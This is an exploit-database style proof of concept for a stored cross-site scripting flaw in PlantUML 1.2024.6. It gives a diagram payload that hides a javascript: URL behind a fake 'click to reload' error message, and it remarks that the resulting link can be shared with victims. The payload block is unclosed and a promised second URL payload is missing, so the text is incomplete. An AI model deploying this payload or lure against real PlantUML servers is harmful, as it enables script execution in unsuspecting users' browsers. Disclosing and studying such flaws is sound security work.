#Exploit Title: PlantUML version 1.2024.6 Cross Site Scripting (XSS)  
#Date: 23/08/2024  
#Exploit Author: Hosein Vita  
#Vendor Homepage:  
#Version: 1.2024.6  
#Tested on: Linux  
This proof-of-concept demonstrates a Cross-Site Scripting (XSS) vulnerability in PlantUML. The vulnerability can be exploited by embedding malicious JavaScript within a diagram using SVG code. When the rendered element is clicked, the payload triggers an alert, demonstrating the potential for executing arbitrary scripts in the user's browser.  
Proof of Concept:  
Copy code  
digraph G {  
graph [bgcolor="white"];  
node [shape=box, style="rounded,filled", color="white"];  
heading [fillcolor="white", label=<<table border="0" cellborder="0"><tr><td align="left">Error - Failed to load the content.<br/>Please click to reload..</td></tr></table>>, URL="javascript:alert(1);"];  
Alternatively, you can reproduce the issue by appending the following string to https://<plantumlserver>/plantuml/svg/:  
Copy code  
This proof-of-concept remains stored and can be shared as a link with potential victims.